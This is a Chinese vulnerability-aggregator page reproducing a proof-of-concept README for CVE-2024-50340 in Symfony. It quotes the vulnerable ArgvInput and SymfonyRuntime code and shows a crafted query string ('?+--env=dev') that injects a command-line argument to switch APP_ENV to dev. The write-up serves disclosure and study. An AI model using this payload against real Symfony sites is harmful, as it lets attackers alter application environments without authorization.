POC详情: 1d8c2990387e7d72afff571798b020016a05335c

来源
关联漏洞
标题: Symfony 注入漏洞 (CVE-2024-50340)
描述:Symfony是Symfony公司的一个用于 Web 和控制台应用程序的 PHP 框架以及一组可重用的 PHP 组件。 Symfony存在注入漏洞,该漏洞源于允许将PHP应用程序与全局状态分离。
介绍
# CVE-2024-50340 POC

## Requirements 
The register_argc_argv option must be enabled in the PHP configuration file (php.ini). This setting loads command-line arguments into $_SERVER['argv'].

## Explanation of Vulnerable Code
This Symfony code uses input arguments (ArgvInput) to determine the values of certain environment variables, specifically APP_ENV and APP_DEBUG. Here are the relevant parts of Symfony’s code:
```php
//Symfony\Component\Runtime\SymfonyRuntime
$input = new ArgvInput();

if (isset($this->options['env'])) {
    return $this->input = $input;
}

if (null !== $env = $input->getParameterOption(['--env', '-e'], null, true)) {
    putenv($this->options['env_var_name'].'='.$_SERVER[$this->options['env_var_name']] = $_ENV[$this->options['env_var_name']] = $env);
}

if ($input->hasParameterOption('--no-debug', true)) {
    putenv($this->options['debug_var_name'].'='.$_SERVER[$this->options['debug_var_name']] = $_ENV[$this->options['debug_var_name']] = '0');
}
```

The code above processes arguments provided through ArgvInput. If the --env parameter is specified in argv, it updates the environment variable APP_ENV accordingly. Similarly, if --no-debug is present, it sets APP_DEBUG to 0.

### The ArgvInput Class
The ArgvInput class initializes argv parameters passed via the command line or, by default, those in $_SERVER['argv']. The array_shift($argv); function removes the first element from the $argv array (normally the application name) and stores the remaining arguments in $this->tokens.

```php
//Symfony\Component\Console\Input\ArgvInput
public function __construct(?array $argv = null, ?InputDefinition $definition = null)
{
    $argv ??= $_SERVER['argv'] ?? [];

    // strip the application name
    array_shift($argv);

    $this->tokens = $argv;

    parent::__construct($definition);
}
```
## PoC Example
Using the following URL: http://localhost/?+--env=dev, we can inject a --env=dev argument into $_SERVER['argv']. This allows us to change the APP_ENV value to dev without modifying the application’s configuration directly.
1. When accessing http://localhost/?+--env=dev, $_SERVER['argv'] might look like this:
```php
$_SERVER['argv'] = ["+--env=dev"];
```
2. In the ArgvInput class, after the array_shift operation, $argv becomes:
```php
$argv = ["--env=dev"];
```
3. ArgvInput will then recognize --env=dev as a valid parameter and will update APP_ENV accordingly through the getParameterOption method.

文件快照

[4.0K] /data/pocs/1d8c2990387e7d72afff571798b020016a05335c └── [2.4K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。